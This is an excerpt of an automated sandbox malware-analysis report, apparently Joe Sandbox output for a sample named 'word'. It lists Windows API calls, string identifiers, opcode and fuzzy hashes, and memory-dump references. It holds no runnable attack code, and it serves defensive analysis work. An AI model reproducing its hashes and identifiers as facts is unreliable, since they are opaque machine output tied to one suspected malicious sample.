                                                                            • API String ID: 455545452-1403004172
                                                                            • Opcode ID: 19b239a33d6ccea3c1be09f9a3ff48f3ef4fb117e78275193105084191351ab7
                                                                            • Instruction ID: d7878a024921556205560296ec06e6abf53b779169672b4943ab7ad66f70e2c7
                                                                            • Opcode Fuzzy Hash: 19b239a33d6ccea3c1be09f9a3ff48f3ef4fb117e78275193105084191351ab7
                                                                            • Instruction Fuzzy Hash: 2601D6327011106B8600BB299C019AFB39DDBC2370F544A2FF965573D1EA39AC0E476A
                                                                            APIs
                                                                            • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00442B8C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: InternetOpen
                                                                            • String ID: <local>
                                                                            • API String ID: 2038078732-4266983199
                                                                            • Opcode ID: 6ab628e9b643b7f337e7eb9a1eb164a667740d16f62f34970bb7649561c47b18
                                                                            • Instruction ID: 525aca290fb55aeb65c4bf55ca0deee88c9418ef2a1db54778758d1eb2e06c8a
                                                                            • Opcode Fuzzy Hash: 6ab628e9b643b7f337e7eb9a1eb164a667740d16f62f34970bb7649561c47b18
                                                                            • Instruction Fuzzy Hash: 9011A934144751AAF621DF108D86FB77794FB50B01F50480FF9866B2C0D6F4B848C766
                                                                            APIs
                                                                              • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                            • SendMessageW.USER32(00000000,00000180,00000000,00000000), ref: 00469660
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend_wcslen
                                                                            • String ID: ComboBox$ListBox
                                                                            • API String ID: 455545452-1403004172
                                                                            • Opcode ID: 9c387d355752c609e3ec3b71bdfa1ce54c6356e755a59a855018ee08606d8eab
                                                                            • Instruction ID: 486d2595d5a7427da4a9c048e684990a8dc9cac685a8154682435d05c4426571
                                                                            • Opcode Fuzzy Hash: 9c387d355752c609e3ec3b71bdfa1ce54c6356e755a59a855018ee08606d8eab
                                                                            • Instruction Fuzzy Hash: A101D87274121027C600BA259C01AEBB39CEB96354F04443BF94597291EA6DED0E43AA
APIs
Strings
Similarity
• API ID: MessagePost
• String ID: X+
• API String ID: 410705778-1938338529
• Opcode ID: f1a10e336183c0ff2b6d957fcf18a3a835ea54dd3f96ed3d36d0cc8343e646a5
• Instruction ID: ba536238118c8d010d3f6b0aa660f9f8498b4d39804cd88edc9aab5a1a4e475f
• Opcode Fuzzy Hash: f1a10e336183c0ff2b6d957fcf18a3a835ea54dd3f96ed3d36d0cc8343e646a5
• Instruction Fuzzy Hash: 4A115E316402019FD320CF69DCC0E67B7A9FB8A324F64861EE564873A1C771A895CB64
APIs
  • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
• SendMessageW.USER32(00000182,00000182,?,00000000), ref: 004695D6
Strings
Similarity
• API ID: MessageSend_wcslen
• String ID: ComboBox$ListBox
• API String ID: 455545452-1403004172
• Opcode ID: ebc0188a5584a95c85a0cdadc4297c14a5cc600b4744d97cee4f9a5f6612b8f9
• Instruction ID: 72d13aeac174e9c1a3a177398698555a642000804846b33da1492f44d6438514
• Opcode Fuzzy Hash: ebc0188a5584a95c85a0cdadc4297c14a5cc600b4744d97cee4f9a5f6612b8f9
• Instruction Fuzzy Hash: 4D01A77374111067C610BA6A9C01AEB739CABD2364F44443BF94597292EA7DED0E43AA
APIs
• SendMessageW.USER32(?,00000401,00000000,00000000), ref: 00447AE5
• DefDlgProcW.USER32(?,0000002B,?,?,004A83D8,?), ref: 00447B09
Strings
Similarity
• API ID: MessageProcSend
• String ID: X+
• API String ID: 650375871-1938338529
• Opcode ID: 282f86207f84fb720c1c146b20eb36cb5bd987ddbd5c6a609029bff053d642d3
• Instruction ID: cf0c3d739a266ecf9dfb39524e393d8b6385858120b34e0c7784725de632f42e
• Opcode Fuzzy Hash: 282f86207f84fb720c1c146b20eb36cb5bd987ddbd5c6a609029bff053d642d3
• Instruction Fuzzy Hash: 8F01DB323002509BD320DF48D888F6BB769EBDA725F14492EFA409B280C7B5B806C775
APIs
Strings
Similarity
• API ID: _strncmp
• String ID: ,$UTF8)
• API String ID: 909875538-2632631837
• Opcode ID: 727c7c5760fb27673dbb24875b26f121239a8201232c39922ad2fa80f7f85d54
• Instruction ID: 35c0b5e4e6bd282640ba12729024cfd3588da47ca1ed1c49f01331a057b7ec9b
• Opcode Fuzzy Hash: 727c7c5760fb27673dbb24875b26f121239a8201232c39922ad2fa80f7f85d54
• Instruction Fuzzy Hash: 7601B575A083805BE720DE20CC85BA773A1AB81319F58492ED8D5872A1F73DD449C75B
APIs
Strings
Similarity
• API ID: _strncmp
• String ID: ,$UTF8)
• API String ID: 909875538-2632631837
• Opcode ID: abd9c85c193eb76a615b38e8260140970f327620044c052ec7ea970ca86f7e2a
• Instruction ID: b3c6803870d1b21283bf32431af321d4190ac902c568a1d8b2e557ddf245ca97
• Opcode Fuzzy Hash: abd9c85c193eb76a615b38e8260140970f327620044c052ec7ea970ca86f7e2a
• Instruction Fuzzy Hash: 1E01D875A043805BE720DE20CC85B6773A19B4131AF68492FD8D6872A1F73DD449C75B
APIs
• SendMessageW.USER32(?,00001001,00000000,?), ref: 004560BA
  • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
• wsprintfW.USER32 ref: 004560E9
Strings
Similarity
• API ID: MessageSend_mallocwsprintf
• String ID: %d/%02d/%02d
• API String ID: 1262938277-328681919
• Opcode ID: a0b39a4cd3c0c8a7adb8db444dc879b20475413a32e353ad3a6ec36c60b55e02
• Instruction ID: 2a73c44ac592e0fe880a68d863bd42ca8887a008949f121bccc13d44bcf2ebb3
• Opcode Fuzzy Hash: a0b39a4cd3c0c8a7adb8db444dc879b20475413a32e353ad3a6ec36c60b55e02
• Instruction Fuzzy Hash: 13F08272744220A7E2105BA5AC01BBFB3D4EB84762F10443BFE44D12C0E66E8455D7BA
APIs
• FindWindowW.USER32 ref: 0044226C
• PostMessageW.USER32 ref: 0044227F
  • Part of subcall function 00436272: Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
Strings
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
• Opcode ID: 62d1e1a02585172d548c808ed695c1d9d3028cc69dace886715b1b3d1423c17e
• Instruction ID: f0ed9326d30a696a9ade51716a531e8bd1705000bbe21894ac7a57cb5589152b
• Opcode Fuzzy Hash: 62d1e1a02585172d548c808ed695c1d9d3028cc69dace886715b1b3d1423c17e
• Instruction Fuzzy Hash: 71D0A772F8130177E92077706D0FFCB26246F14710F010C3AB305AA1C0D4E8D440C358
APIs
• FindWindowW.USER32 ref: 00442240
• PostMessageW.USER32 ref: 00442247
  • Part of subcall function 00436272: Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
Strings
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
• Opcode ID: d3682f88803cb2a3efb7847c83fab5a73234bf1983908037f6894d5424c159e3
• Instruction ID: d1e5b9be119239975405e397b0c0efdc35250005003305bf123d4268f2ecb06f
• Opcode Fuzzy Hash: d3682f88803cb2a3efb7847c83fab5a73234bf1983908037f6894d5424c159e3
• Instruction Fuzzy Hash: 4DD05E72B813013BE92076706D0FF8B26246B14710F010C2AB205AA1C0D4E8A4408358
APIs
• MessageBoxW.USER32 ref: 00439522
  • Part of subcall function 00411A1F: _doexit.LIBCMT ref: 00411A2B
Strings
Similarity
• API ID: Message_doexit
• String ID: AutoIt$Error allocating memory.
• API String ID: 1993061046-4017498283
• Opcode ID: 98c4a6cf209f69c689245cd57ea7e643062e7ce984d6ae84015e6f4dd77dfbd0
• Instruction ID: 5d68346425d2699d55792fe39b85c2381918ba1f955abba655776c5540820644
• Opcode Fuzzy Hash: 98c4a6cf209f69c689245cd57ea7e643062e7ce984d6ae84015e6f4dd77dfbd0
• Instruction Fuzzy Hash: 82B092343C038627E20437A01C0BF8C28049B64F42F220C2AB308384D259D90080231E